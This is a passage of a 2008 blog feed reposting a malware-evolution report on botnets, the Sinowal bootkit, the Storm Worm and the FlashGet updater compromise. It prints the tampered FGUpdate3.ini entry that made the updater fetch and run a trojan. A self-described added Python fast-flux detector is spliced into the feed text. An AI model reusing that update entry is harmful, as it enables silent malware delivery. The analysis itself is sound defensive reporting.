Engines from different developers have to be developed with peaceful coexistence in mind (as is the case with Antigen). Another alternative is to develop double or triple layer protection against Internet threats. &lt;br /&gt;&lt;br /&gt;The conclusion: it’s likely that things won’t turn out that badly. However, some antivirus companies will have to start cutting their budgets and thinning the ranks of their employees. Public companies will find that Microsoft’s entry to the antivirus market will impact the value of shares, and a fall in value will have the following negative consequences: &lt;br /&gt;&lt;br /&gt;It will be harder to attract investment&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Employees’ share options will be devalued&lt;br /&gt;&lt;br /&gt;One consequence will be that middle and senior management will desert the company. &lt;br /&gt;&lt;br /&gt;Summary&lt;br /&gt;Changes are underway in the antivirus industry and will continue for some time to come. It’s not unlikely that Microsoft’s entry to the IT security market will be a decisive factor which affects the changing situation. The software giant’s entry will undoubtedly have an impact on the best-known industry players, and the current market share of antivirus companies is likely to change radically. Naturally, each company will be affected in a different way. For some, it will come as a heavy blow, while others will barely be affected and yet others will welcome Microsoft’s arrival on the market. 
&lt;br /&gt;&lt;br /&gt;The most negative consequences will be felt by:&lt;br /&gt;&lt;br /&gt;Publicly held companies &lt;br /&gt;Businesses which rely on income from the market sector which Microsoft is entering &lt;br /&gt;Manufacturers with engines which are inferior in quality to Microsoft’s &lt;br /&gt;Manufacturers whose engines aren't used in Antigen &lt;br /&gt;The brightest future awaits:&lt;br /&gt;&lt;br /&gt;Privately held companies &lt;br /&gt;Manufacturers with a broad product range &lt;br /&gt;Manufacturers with a high-quality engine &lt;br /&gt;Manufacturers whose engines are used in Antigen &lt;br /&gt;Hopefully, the arrival of the software giant on the IT security market will have a positive impact on future developments in this field and will raise the quality of security solutions. It is to be hoped that the Internet will become a safer place as a result - every desk will not only have a computer on it, but a secure computer.</content><link rel='replies' type='application/atom+xml' href='http://virusopedia.blogspot.com/feeds/8960919967365177888/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=2383994250717691599&amp;postID=8960919967365177888' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2383994250717691599/posts/default/8960919967365177888'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2383994250717691599/posts/default/8960919967365177888'/><link rel='alternate' type='text/html' href='http://virusopedia.blogspot.com/2008/06/virus-defense-and-our-defense.html' title='Virus Defense and Our Defense'/><author><name>PROF. 
SJAFW</name><uri>http://www.blogger.com/profile/00700919093101522027</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='18053836773761000586'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2383994250717691599.post-8991947875030838670</id><published>2008-06-07T09:26:00.000-07:00</published><updated>2008-06-07T09:35:59.826-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='virus'/><category scheme='http://www.blogger.com/atom/ns#' term='enterprise'/><category scheme='http://www.blogger.com/atom/ns#' term='cyber'/><category scheme='http://www.blogger.com/atom/ns#' term='evolution'/><category scheme='http://www.blogger.com/atom/ns#' term='weapon'/><category scheme='http://www.blogger.com/atom/ns#' term='cyber terrorism'/><category scheme='http://www.blogger.com/atom/ns#' term='criminals'/><category scheme='http://www.blogger.com/atom/ns#' term='globalization'/><category scheme='http://www.blogger.com/atom/ns#' term='anti-cyber'/><title type='text'>Bot Nets and Future Virtual Virus Enterprise</title><content type='html'>A BotNet&lt;br /&gt;&lt;br /&gt;Botnets have been in existence for about 10 years; experts have been warning the public about the threat posed by botnets for more or less the same period. Nevertheless, the scale of the problem caused by botnets is still underrated and many users have little understanding of the real threat posed by zombie networks (that is, until their ISP disconnects them from the Internet, or money is stolen from their credit cards, or their email or IM account is hijacked). &lt;br /&gt;&lt;br /&gt;A botnet is a network of computers which are infected with a malicious program that enables cybercriminals to remotely control infected computers. 
Malicious programs that are designed specifically for use in creating botnets are called bots.&lt;br /&gt;&lt;br /&gt;Botnets have vast computing power. They are used as a powerful cyber weapon and are an effective tool for making money illegally. The owner of a botnet can control the computers which form the network from anywhere in the world – from another city, country or even another continent. Importantly, the Internet is structured in such a way that a botnet can be controlled anonymously. &lt;br /&gt;&lt;br /&gt;The owner of an infected machine usually does not even suspect that the computer is being used by cybercriminals. Most zombie machines are home users’ PCs. &lt;br /&gt;&lt;br /&gt;Botnets can be used by cybercriminals for conducting a broad range of malicious activities, from sending spam to attacking government networks. &lt;br /&gt;&lt;br /&gt;Sending spam. This is the most common use for botnets, and is also one of the simplest. Experts estimate that over 80% of spam is sent from zombie computers. It should be noted that spam is not always sent by botnet owners: botnets are often rented by spammers. &lt;br /&gt;&lt;br /&gt;According to our data, an average spammer makes $50,000 – $100,000 a year. Botnets made up of thousands of computers allow spammers to send millions of messages from infected machines within a very short space of time.&lt;br /&gt;&lt;br /&gt;Blackmail. The second most popular method of making money via botnets is to use tens or even hundreds of thousands of computers to conduct DDoS (Distributed Denial of Service) attacks. This involves sending a stream of false requests from bot-infected machines to the web server under attack. As a result, the server will be overloaded and consequently unavailable. As a rule, cybercriminals demand payment from the server’s owner in return for stopping the attack.&lt;br /&gt;&lt;br /&gt;Today, many companies work exclusively on the Internet. 
Downed servers bring business to a halt, resulting in financial losses. To return stability to servers as soon as possible, such companies are more likely to give in to blackmail than ask the police for help. This is exactly what cybercriminals are counting on, and DDoS attacks are becoming increasingly common. &lt;br /&gt;&lt;br /&gt;DDoS attacks can also be used as a political tool. In such cases, attacks usually target servers belonging to government organizations. What makes such attacks particularly dangerous is that they can be used as provocation, with a cyber attack on one country being conducted from servers in another country and controlled from a third country. &lt;br /&gt;&lt;br /&gt;Anonymous Internet access. Cybercriminals can access web servers using zombie machines and commit cybercrimes such as hacking websites or transferring stolen money. This activity, of course, appears to come from the infected machines. &lt;br /&gt;&lt;br /&gt;Selling and leasing botnets. One option for making money illegally using botnets is based on leasing them or selling entire networks. Creating botnets for sale is also a lucrative criminal business.&lt;br /&gt;&lt;br /&gt;Phishing. Addresses of phishing pages are often blacklisted soon after they appear. A botnet allows phishers to change the addresses of phishing pages frequently, using infected computers as proxy servers. This helps conceal the real address of the phishers' web server. &lt;br /&gt;&lt;br /&gt;Theft of confidential data. This type of criminal activity will probably never lose its attraction for cybercriminals. Botnets help increase the haul of passwords (passwords to email and ICQ accounts, FTP resources, web services etc.) and other confidential user data by a factor of a thousand. 
A bot used to create a zombie network can download another malicious program, e.g., a password stealing (PSW) Trojan, and infect all the computers on the botnet with it, providing cybercriminals with passwords from all the infected computers. Stolen passwords are sold or used for mass infections of web pages (in the case of FTP account passwords) in order to further spread the bot program and expand the zombie network. &lt;br /&gt;&lt;br /&gt;The botnet business&lt;br /&gt;The answer to the question of why botnets keep evolving and why they are coming to pose an increasingly serious threat lies in the underground market that has sprung up around them. Today, cybercriminals need neither specialized knowledge nor large amounts of money to get access to a botnet. The underground botnet industry provides everyone who wants to use a botnet with everything they need, including software, ready-to-use zombie networks and anonymous hosting services, at low prices.&lt;br /&gt;&lt;br /&gt;The first thing needed to create a botnet is a bot, i.e. a program that can remotely perform certain actions on a user’s computer without the user’s knowledge. Software for creating botnets can be easily purchased on the Internet by simply finding an appropriate advertisement and contacting the advertiser. &lt;br /&gt;&lt;br /&gt;A simple web-oriented botnet requires a hosting site where a command and control center can be located. Such sites are readily available, and come complete with support and anonymous access to the server (providers of anonymous hosting services usually guarantee that log files will not be accessible to anybody, including law enforcement agencies). Advertisements like the one shown below are abundant on the Internet. &lt;br /&gt;&lt;br /&gt;When a C&amp;C site has been created, what’s needed next are computers infected by a bot. One option is to buy a ready-made network with somebody else’s bot installed. 
Since stealing botnets is a common practice, most buyers prefer to replace both the malicious programs and the command and control centers with their own, thereby gaining guaranteed control over the botnet. &lt;br /&gt;&lt;br /&gt;Conclusion&lt;br /&gt;Today, botnets are among the main sources of illegal income on the Internet and they are powerful weapons in the hands of cybercriminals. It is totally unrealistic to expect that criminals will relinquish such an effective tool. Security experts view the future with some trepidation as they anticipate the continued development of botnet technologies. &lt;br /&gt;&lt;br /&gt;It may not only be cybercriminals who have an interest in creating international botnets. Such botnets can be used by governments or individuals to exert political pressure in tense situations. In addition, anonymous control of infected machines that does not depend on their geographic location could be used to provoke cyber conflicts. All this takes is organizing a cyber attack on one country’s servers from computers located in another country. &lt;br /&gt;&lt;br /&gt;Networks which unite the resources of tens or hundreds of thousands or even millions of infected computers have the potential to be extremely dangerous – a potential which (luckily!) has not yet been fully exploited. Virtually all this cyber power stems from infected home computers, which make up the overwhelming majority of zombie machines exploited by cybercriminals. &lt;br /&gt;&lt;br /&gt;Our annual report on malware evolution in 2007, published a few months ago, contained forecasts on how the threat landscape would evolve in 2008. Now that the first three months of the year have passed, we can start to draw some preliminary conclusions. &lt;br /&gt;&lt;br /&gt;Unfortunately, as often happens in the antivirus industry, the conclusions are fairly discouraging. 
The speed at which the number of malicious programs is rising continues to increase, with thousands of new variants being detected every day. This is starting to be accompanied by increased technical sophistication, and we are also seeing a shift in attack vectors, with malicious users starting to direct their attention to less well protected fields, such as Web 2.0 technologies and mobile devices. &lt;br /&gt;&lt;br /&gt;We continue to see the reincarnation of old ideas and techniques, and the implementation of these at new levels enhances the level of threat. Examples are infecting boot sectors on victim machines, spreading malicious programs via storage media, and infecting files. &lt;br /&gt;&lt;br /&gt;It looks as though the first quarter of 2008 brought the symbolic, but irrevocable death of the old school of virus writing. At the end of February, the site of the legendary 29A group officially announced that the group would cease to exist. &lt;br /&gt;&lt;br /&gt;The people who had created "Cap" (the first macro virus to cause a global epidemic), "Stream" (the first virus for additional NTFS streams), "Donut" (the first virus for the .NET platform), "Rugrat" (the first virus for the Win64 platform), the mobile viruses Cabir and Duts and many others, have now retreated, under pressure from the increased criminalization of the world of virus writers. No one creates malicious programs to express themselves, assert their personality or for research purposes anymore – it's far more profitable to generate hundreds of primitive Trojan programs and then sell them. &lt;br /&gt;&lt;br /&gt;The death of 29A was commented on by nearly all the major antivirus companies: each company threw a virtual clod of earth on the grave of the group which in its time created many difficulties for virus analysts. So it's fitting that we should also mention the event. 
&lt;br /&gt;&lt;br /&gt;As for what came to replace the 'romantic' ideal of virus writing in 2008, this is discussed in the following chapters:&lt;br /&gt;&lt;br /&gt;Bootkit &lt;br /&gt;The storm continues &lt;br /&gt;TrojanGet &lt;br /&gt;Some sociable worms &lt;br /&gt;Mobile news &lt;br /&gt;Bootkit&lt;br /&gt;Bootkit rootkits – rootkits with the ability to boot from the boot sector of any device – became, de facto, the main problem for the antivirus industry at the start of 2008. Although the efforts made to combat this problem, and the seriousness of the issue may not have been obvious to the public at large, it may be that the subject will come to cause problems for everyone in the near future.&lt;br /&gt;&lt;br /&gt;The story begins&lt;br /&gt;It all started in November 2007, or perhaps, more correctly, in 2005. However, this isn't totally correct either. Let's take a quick trip into the past and recall what took place 22 years ago, in 1986.&lt;br /&gt;&lt;br /&gt;This is how the events of that year are described in the Virus Encyclopaedia on viruslist.com (http://www.viruslist.com/en/viruses/encyclopedia?chapter=153311030):&lt;br /&gt;&lt;br /&gt;The first global IBM-compatible virus epidemic was detected. Brain, which infected the boot sector, was able to spread practically worldwide within a few months. The almost total lack of awareness in the computing community of how to protect machines against viruses ensured Brain's success. In fact, the appearance of numerous science fiction works on the topic only strengthened the panic, instead of teaching people about security.&lt;br /&gt;&lt;br /&gt;The Brain virus was written by a 19 year old Pakistani programmer, Basit Farooq Alvi, and his brother Amjad, and included a text string containing their names, address and telephone number. According to the virus's authors, who worked in sales for a software company, they wanted to gauge the level of piracy in their country. 
Aside from infecting a disk's boot sector and changing the disk name to '© Brain', the virus did nothing; it had no real payload, and did not corrupt data. Unfortunately, the brothers lost control of their so-called experiment and Brain spread worldwide.&lt;br /&gt;&lt;br /&gt;Interestingly enough, Brain was also the first 'stealth virus.' When an attempt to read the infected sector was detected, the virus would display the original, uninfected data. &lt;br /&gt;&lt;br /&gt;So this was the start of the story. For more than 10 years, boot viruses were one of the most widespread types of malicious programs. &lt;br /&gt;&lt;br /&gt;The principle on which these viruses work is relatively simple: they exploit the sequence by which the operating system is launched when the computer is switched on or rebooted. The system boot program reads the first physical sector of the boot disk (A:, C:, or the CD-ROM drive, depending on BIOS Setup parameters) and passes control to it. If there is a virus in the boot sector, the virus will gain control. &lt;br /&gt;&lt;br /&gt;There's only one method known which is used to infect floppies: the virus replaces the original boot sector code on the disk with its own code. The hard drive can be infected in three different ways – the virus either replaces the MBR code with its own code; replaces the boot sector code on the boot disk (usually C:) with its own code; or modifies the address of the active boot sector in the Disk Partition Table located in the hard drive MBR. &lt;br /&gt;&lt;br /&gt;In the majority of cases, when infecting the disk the virus moves the original boot sector (or the MBR) to another disk sector (for instance, to the first free sector). &lt;br /&gt;&lt;br /&gt;Developers started adding protection to prevent the MBR from being written to. Windows 95/98 appeared, floppies started to disappear from use, and after almost a decade, boot sector viruses faded from the landscape, becoming part of the history of virology. 
&lt;br /&gt;&lt;br /&gt;However, at Black Hat USA in 2005, Derek Soeder and Ryan Permeh, two researchers from eEye Digital Security, presented BootRoot. This technology made it possible to place code in the boot sector of the disk – code that would intercept the booting of the Windows kernel and launch a backdoor, making it possible to remotely administer the machine via the local network. &lt;br /&gt;&lt;br /&gt;This work attracted a certain amount of attention, and it was soon emulated. In January 2006, John Heasman from Next-Generation Security Software announced that the functions for managing the computer's power supply (the so-called ACPI – Advanced Configuration and Power Interface) make it possible to create programs which implement rootkit functions and can be saved to the BIOS flash memory. Malicious code saved in this location (the BIOS) is more difficult to detect than in the case of the boot backdoor. Heasman also created prototype code which makes it possible to elevate system privileges and read data from the computer's memory. &lt;br /&gt;&lt;br /&gt;A year later, at the end of 2007, two Indian programmers called Nitin and Vipin Kumar presented Vbootkit – a rootkit with a function making it capable of launching from the boot sector of any device. The program can also run on Windows Vista. The source code was not made public, but was passed to some antivirus companies. &lt;br /&gt;&lt;br /&gt;The main principle behind Vbootkit is shown below:&lt;br /&gt;&lt;br /&gt;BIOS --&gt; Vbootkit code (from CD, PXE etc.) --&gt; MBR --&gt; NT Boot sector --&gt; Windows Boot manager --&gt; Windows Loader --&gt; Vista Kernel.&lt;br /&gt;The authors promised to implement BIOS infection in the next version of the bootkit. &lt;br /&gt;&lt;br /&gt;In other words, what came to pass was no surprise – old technology for infecting the boot sector was combined with the fashion for rootkits. 
In spite of the fact that nearly all antivirus products today are able to scan the boot sectors of disks, it's still difficult to detect whether system functions have been intercepted or substituted. This is true even when a Trojan and an antivirus are running on the same operating system, before we even consider a backdoor which starts before the operating system has launched. &lt;br /&gt;&lt;br /&gt;All of the above seems like a potentially explosive mixture that could go up at any moment. And the explosion came in November 2007, although news of it arrived slightly later, at the end of December, when several thousand users (there is no exact data on the number of infections) came under attack from the first malicious implementation of a bootkit. &lt;br /&gt;&lt;br /&gt;The bootkit&lt;br /&gt;Between 19 and 28 December several websites appeared which used drive-by downloads (infecting a victim machine by placing exploits on a web site which then download a malicious program). A detailed analysis of the malicious program revealed code able to infect the MBR and hard disk sectors. &lt;br /&gt;&lt;br /&gt;Once on the victim machine, the malicious code modifies the MBR, writes the rootkit part to a disk sector, extracts a Windows backdoor from itself, installs the backdoor, and then deletes itself. &lt;br /&gt;&lt;br /&gt;When infecting the MBR, the instructions written there pass control to the main part of the rootkit, which is placed on several hard disk sectors and is not represented as files in the system. This part monitors the already loaded Windows operating system and, when those sectors are read, hides the infected MBR and the "dirty" sectors by presenting clean ones instead. It does this by intercepting and substituting system functions. 
&lt;br /&gt;&lt;br /&gt;In addition to hiding its presence in the system, the malicious code installs a backdoor in Windows; the backdoor steals user data, including account data for a range of online banking systems. &lt;br /&gt;&lt;br /&gt;A reconstruction of events based on the variants of the rootkit detected, analysis of the infected sites and the code of the malicious program downloaded from these sites showed that from November 2007, the unknown authors had been preparing to launch their code on the world. Several of the first variants of this malicious program date from mid-November to mid-December; these are effectively alpha versions which contain serious errors in the code, and indicate that the authors were searching for optimal variants.&lt;br /&gt;&lt;br /&gt;The code released at the end of December was already relatively effective. We classified the malicious program, which combined the functions of a bootkit and a backdoor, as Backdoor.Win32.Sinowal. This was because many of the functions in the backdoor, and also the method used to 'litter' code, were identical to those which we are familiar with in Trojan-PSW.Win32.Sinowal.&lt;br /&gt;&lt;br /&gt;In spite of increased sophistication and the many innovations implemented in the bootkit, it's only able to protect itself – this leaves the backdoor file open to being detected and deleted. This indicates that different people were involved in developing the bootkit and the backdoor, and there are a number of reasons to suggest that the bootkit was created by virus writers from Russia. There are well known cases in which virus writers have worked together. However, the result in this case suggests a warrior who has been hastily dressed in another's reforged armour which is, effectively, useless. 
&lt;br /&gt;&lt;br /&gt;Nevertheless, the bootkit appears to be a self-sufficient platform – something that could be added to any existing malicious program in order to protect that program and mask its presence in the system. It may be that bootkits for sale will appear in the near future, making the technology available to thousands of script kiddies. Taking into account the rate at which the number of malicious programs is increasing, this could become one of the most widespread threats. &lt;br /&gt;&lt;br /&gt;Protecting against bootkits: the problems&lt;br /&gt;Why is it so difficult to protect against bootkits? The main problems are as follows:&lt;br /&gt;&lt;br /&gt;The malicious code gains control before the operating system starts, and, consequently, before the antivirus program starts &lt;br /&gt;It's difficult to detect the interception of functions from within an infected operating system &lt;br /&gt;Restoring intercepted functions can lead to the entire operating system crashing &lt;br /&gt;Curing the MBR is only possible if the original MBR can be detected &lt;br /&gt;Of course, the best protection is to prevent the system from getting infected in the first place – after all, a bootkit doesn't materialize out of thin air. It has to get onto the computer somehow. Some antivirus programs are able to prevent infection even by unknown variants of malicious programs. However, there is always the possibility that such protection can be penetrated, and this raises the question of how to disinfect an already infected machine.&lt;br /&gt;&lt;br /&gt;Here there are two options – either an antivirus is already installed on the system (in such cases, the four points mentioned above relate to the antivirus solution) or there is no antivirus, and one needs to be installed. In the second case, we encounter an additional problem related to that in point 1; the malicious code can block attempts to install an antivirus solution on the infected system. 
&lt;br /&gt;&lt;br /&gt;Virus writers have analysed how antivirus companies solve the problems listed above, and in February 2008, a new improved version of the bootkit was released. All the methods previously implemented to combat bootkits turned out to be useless. &lt;br /&gt;&lt;br /&gt;At the same time, the bootkit started spreading in new ways. Links to sites containing exploits which would install the bootkit were discovered on a number of European sites which had been hacked. &lt;br /&gt;&lt;br /&gt;So far, apart from Sinowal, we haven't detected any other malicious programs which come equipped with a bootkit. At the moment, the standoff between antivirus companies and virus writers is following the classic path of attack and counter-attack. Even the latest variants of the bootkit can be combated without significant innovations in antivirus solutions. &lt;br /&gt;&lt;br /&gt;However, looking a couple of steps down the line, it's clear that sooner or later only one method will guarantee that such malicious programs can be detected and deleted. This will entail a shift from software protection to hardware protection. &lt;br /&gt;&lt;br /&gt;The key question is what gains control first – if it's the virus, then an antivirus will, a priori, be useless. &lt;br /&gt;&lt;br /&gt;So, viruses have (again) reached the MBR. 10 years ago we solved this problem by using a boot disk equipped with an antivirus. It may be that the time is coming when we'll see the return of not just old virus technologies, but old antivirus technologies as well. &lt;br /&gt;&lt;br /&gt;The storm continues&lt;br /&gt;Mid January 2008 marked the first anniversary of the appearance of the first samples of what would become known, variously, as Zhelatin, Nuwar or the Storm Worm. Until then, computer virology had not encountered such a vigorously and variedly evolving malicious program. 
&lt;br /&gt;&lt;br /&gt;Zhelatin continued to use and develop the concepts which had been implemented in the Bagle and Warezov worms. Zhelatin took its modular structure from Bagle, and copied Warezov in the frequent release of new variants. It also resembled Warezov in moving away from mass-mailing the main component via email, instead using hundreds of infected sites as well as Skype and IM to spread the malicious code. Added to all of this were social engineering tricks, rootkit technologies, methods for launching counter attacks on antivirus companies, and a decentralized botnet. In less than a year, the Storm Worm became the information security industry's main problem, due to its almost mythical botnet.&lt;br /&gt;&lt;br /&gt;The exact dimensions of the Storm botnet remain a mystery. In 2007 we heard a widely varying range of estimates of the number of infected machines, and these estimates were all voiced around the same time. For instance, in September some experts estimated that the botnet had 2 million machines; others put the figure at between 250,000 and a million, while a third group believed the size to be 150,000 machines. There were even those who talked of 50 million infected computers! The reason for such a wide variety of figures is clear – because of the decentralized nature of the botnet, it's impossible to establish the exact number of zombie machines. Estimates can only be made based on indirect indicators, which are of course debatable. &lt;br /&gt;&lt;br /&gt;Whichever way you look at it, the Storm botnet did exist. However, it was inactive. There was no 'classic' botnet activity detected; it wasn't used for mass mailings, or to conduct DDoS attacks (which, incidentally, doesn't rule out the botnet having been created by cybercriminals for criminal use). 
This left the impression that the botnet didn't perform any function apart from spreading the Storm worm itself (it did this by sending new messages containing links to infected sites and then placing modules on the infected machines which would then be downloaded onto new victim machines). It really wasn't clear why the botnet had been created: simply for the sake of it? But that doesn't happen – botnets take far too many resources to create and maintain. &lt;br /&gt;&lt;br /&gt;Around October 2007, the frequency of mass mailings conducted by Zhelatin started to decline somewhat. Experts who had previously talked about millions of infected machines started to drop their estimates of the size of the botnet to between 150,000 and 200,000 computers. The suspicion emerged that the botnet was being prepared to be sold on in sections. Around the same time, the first mass mailings of spam from computers infected with the Storm Worm were detected. However, it couldn't be stated conclusively that spam was being sent via the botnet, rather than via other malicious programs which might also be located on the victim machines. &lt;br /&gt;&lt;br /&gt;The end of 2007 and the early months of 2008 provided an answer to the question of what was happening with the Storm Worm. &lt;br /&gt;&lt;br /&gt;At Christmas, the worm reappeared. The botnet started sending out millions of messages with titles such as "Find Some Christmas Tail", "Warm up this Christmas" and "Mrs. Clause Is Out Tonight!". The messages were designed to entice the user to a site called merrychristmasdude.com, which contained exploits that would conduct a drive-by download to get the Storm Worm onto victim machines. In actual fact, merrychristmasdude.com wasn't a single site which could have been closed down in order to prevent infection. Zhelatin used fast-flux, a technique for rapidly changing DNS records which constantly moves the location of the site between more than a thousand deliberately prepared computers. 
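Because a fast-flux domain is served by many infected hosts in turn, the DNS traffic for it looks unlike that of a normal site: many distinct A records in a short window, spread across unrelated networks, with very short TTLs so that resolvers keep coming back. The following is an added example, not code from the report: a small detector that summarizes passive-DNS style log lines per domain and flags the combination of many addresses, several distinct networks and a low TTL. The log lines are constructed (RFC 5737 documentation addresses), the "timestamp domain ttl ip" format is assumed, and the thresholds are illustrative; a real deployment would tune them against its own traffic. The sample deliberately includes a legitimate-looking low-TTL CDN record to show that a short TTL on its own is not enough to raise an alert.

```python
# Added example: fast-flux heuristic over passive-DNS style records.
# Not code from the report. Log format "timestamp domain ttl ip" is assumed.
from collections import defaultdict

# Constructed sample: one fluxing domain, one static site, one low-TTL CDN.
SAMPLE_LOG = """\
1198800000 merrychristmasdude.com 30 198.51.100.14
1198800030 merrychristmasdude.com 30 203.0.113.77
1198800060 merrychristmasdude.com 30 192.0.2.201
1198800090 merrychristmasdude.com 30 198.51.100.233
1198800120 merrychristmasdude.com 30 203.0.113.5
1198800150 merrychristmasdude.com 30 192.0.2.44
1198800180 merrychristmasdude.com 30 198.51.100.9
1198800210 merrychristmasdude.com 30 203.0.113.150
1198800000 www.example.org 86400 192.0.2.10
1198800600 www.example.org 86400 192.0.2.10
1198800000 cdn.example.net 60 198.51.100.1
1198800060 cdn.example.net 60 198.51.100.2
"""


def parse_log(text):
    """Parse lines of 'timestamp domain ttl ip' into tuples."""
    records = []
    for line in text.strip().splitlines():
        ts, domain, ttl, ip = line.split()
        records.append((int(ts), domain, int(ttl), ip))
    return records


def summarize(records):
    """Per domain: distinct IPs, distinct /16 networks, lowest TTL seen."""
    per = defaultdict(lambda: {"ips": set(), "nets": set(), "min_ttl": None})
    for _ts, domain, ttl, ip in records:
        s = per[domain]
        s["ips"].add(ip)
        s["nets"].add(".".join(ip.split(".")[:2]))   # crude /16 grouping
        if s["min_ttl"] is None or s["min_ttl"] > ttl:
            s["min_ttl"] = ttl
    return per


def flag_fast_flux(records, min_ips=5, min_nets=2, max_ttl=300):
    """Return {domain: stats} for domains matching all three criteria."""
    flagged = {}
    for domain, s in summarize(records).items():
        many_ips = len(s["ips"]) >= min_ips
        spread = len(s["nets"]) >= min_nets
        short_ttl = max_ttl >= s["min_ttl"]
        if many_ips and spread and short_ttl:
            flagged[domain] = {"ips": len(s["ips"]),
                               "nets": len(s["nets"]),
                               "min_ttl": s["min_ttl"]}
    return flagged


if __name__ == "__main__":
    for domain, stats in flag_fast_flux(parse_log(SAMPLE_LOG)).items():
        print("possible fast-flux:", domain, stats)
```

The three criteria are joined with AND on purpose: a busy CDN has a short TTL, and a large site has many addresses, but few legitimate domains rotate through addresses in several unrelated networks every few seconds.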
&lt;br /&gt;&lt;br /&gt;Similar attacks, with only slight variations, carried on over the next few days, up until 15th January, when something strange happened. Either it was a joke on the part of the authors, or they simply made a mistake; whatever the case, the botnet started sending out messages containing Valentine's cards, even though Valentine's Day was still a month off. &lt;br /&gt;&lt;br /&gt;The messages had titles such as "Sent with Love", "Our Love is Strong", "Your Love Has Opened" and so on. Naturally, the messages led the user to the fast-flux site currently being used. &lt;br /&gt;&lt;br /&gt;The mass mailings in January turned out to be on a larger scale and also more intrusive than those which were conducted in the second half of 2007. They were also the largest mass mailings carried out in the first quarter of 2008. The authors of Zhelatin had struck a series of blows to either return the botnet to its original size or perhaps even to enlarge it. Computers infected by Zhelatin started to participate in DoS attacks, and MessageLabs started estimating that the Storm botnet was behind almost 20% of spam currently being sent out. &lt;br /&gt;&lt;br /&gt;At approximately the same time Fortinet announced it believed the botnet was part of phishing attacks launched against the Barclays and Halifax banks. If this is the case, then it is the first time the Storm botnet has been directly used for classic cybercrime aims. &lt;br /&gt;&lt;br /&gt;At the same time as the Storm Worm increased its activity, talk turned to the need to catch and sentence its authors. However, experts couldn't agree on even the nationality of those behind the worm, never mind naming names. &lt;br /&gt;&lt;br /&gt;At the moment, there are two prevailing points of view. Dmitry Alperovitch from Secure Computing believes that a Russian is responsible, even going so far as to point to a location in St. Petersburg. 
He draws parallels with the notorious Russian Business Network (RBN) and the authors of the exploit bundle Mpack. Many experts support the view of the worm's Russian origins. &lt;br /&gt;&lt;br /&gt;Others believe that the Storm Worm has been created by Americans. This argument is supported by the fact that the authors, in their use of social engineering tactics, demonstrate a suspiciously good knowledge of American life and psychology. The mass mailings play on specific incidents and events which will be of particular interest to the American public. And these events could well be unknown to virus writers from other countries, and particularly those from Russia. &lt;br /&gt;&lt;br /&gt;We do not have any information which supports one point of view or the other. It seems to us that one of the most likely scenarios is that an international group with clearly defined responsibilities lies behind this activity. Someone creates the worm; someone else is responsible for mass mailings; someone else places the worm on the infected sites; someone else hacks the sites; someone else is responsible for spreading the malicious program via instant messaging, and finally, yet another person is responsible for creating the exploits. &lt;br /&gt;&lt;br /&gt;The widespread nature of the Storm Worm and the attack vectors which are being used are far too extensive to be within the capabilities of one, two or three people. If our suppositions are correct, then the Storm Worm is a textbook example of modern cybercrime and its international division of labour. It is of course true that it is still unclear how the cybercriminals are making money using the Storm Worm. &lt;br /&gt;&lt;br /&gt;While we were still looking for the answers to the questions raised by the Storm Worm, at the end of March its authors sent out the latest flood of messages. The occasion – April 1st, known throughout the US, Europe and Russia as April Fool's Day. 
&lt;br /&gt;&lt;br /&gt;The question remains: who will have the last laugh? &lt;br /&gt;&lt;br /&gt;TrojanGet&lt;br /&gt;Although incidents in which legitimate programs and software companies spread infection are relatively rare, they do exist in the information security world. Past cases have ranged from infected distributions to infected document files being sent to clients and partners. &lt;br /&gt;&lt;br /&gt;Every incident of this nature has a significant effect on the reputation either of the software or of the company concerned. Such incidents affect users who do observe the basic rules of computer security, and cause problems for antivirus companies, which view legitimate software and the sources it stems from as trustworthy. &lt;br /&gt;&lt;br /&gt;The first quarter of 2008 brought the latest case of this type. &lt;br /&gt;&lt;br /&gt;At the beginning of March, Kaspersky Lab analysts received messages from users saying that a Trojan was present in the directory of the popular download client FlashGet. Analysis showed that the problem affected users throughout the world. The symptoms of infection were the appearance of files called inapp4.exe, inapp5.exe and inapp6.exe in the system. Kaspersky Anti-Virus detected these files as Trojan-Dropper.Win32.Agent.exo, Trojan-Dropper.Win32.Agent.ezo and Trojan-Downloader.Win32.Agent.kht.&lt;br /&gt;&lt;br /&gt;It was a strange situation: no other Trojan program which could have got this Trojan onto the system was detected. Some of the victims had fully patched operating systems and browsers. So how could these malicious programs have penetrated the infected machines?&lt;br /&gt;&lt;br /&gt;What attracted our attention straight away was the location of the Trojans – in the FlashGet directory itself. 
A quick check showed that apart from the presence of the Trojan files, the FGUpdate3.ini file had recently been created and modified (the blue text shows the differences from the original file):&lt;br /&gt;&lt;br /&gt;[Add]&lt;br /&gt;fgres1.ini=1.0.0.1035&lt;br /&gt;FlashGet_LOGO.gif=1.0.0.1020&lt;br /&gt;inapp4.exe=1.0.0.1031&lt;br /&gt;[AddEx] &lt;br /&gt;[fgres1.ini] &lt;br /&gt;url=http://dl.flashget.com/flashget/fgres1.cab&lt;br /&gt;flag=16&lt;br /&gt;path=%product%&lt;br /&gt;[FlashGet_LOGO.gif] &lt;br /&gt;url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab&lt;br /&gt;flag=16&lt;br /&gt;path=%product%&lt;br /&gt;[inapp4.exe] &lt;br /&gt;url=http://dl.flashget.com/flashget/appA.cab&lt;br /&gt;flag=2&lt;br /&gt;path=%product%&lt;br /&gt;The link to inapp4.exe (the Trojan file) led to the genuine FlashGet site: the Trojan would download from the site in the form of a file called appA.cab.&lt;br /&gt;&lt;br /&gt;There wasn't any information about the incident on the FlashGet site, and a look at the user forum returned a lot of messages both about infections and about the fact that the developers were remaining silent on the matter. &lt;br /&gt;&lt;br /&gt;Information found on the Internet showed that the first cases of infection had been detected back on 29th February. The most recent infection that we knew of at that time had been on 9th March. For ten days, a legitimate program had been acting as a Trojan downloader, installing and launching Trojan programs placed on the developers' site on victim machines. &lt;br /&gt;&lt;br /&gt;It might have seemed that the incident was over – when we published information about this case, the Trojans had already been deleted from the site, and the FGUpdate3.ini file (which is also downloaded from the Internet) had been reverted to its 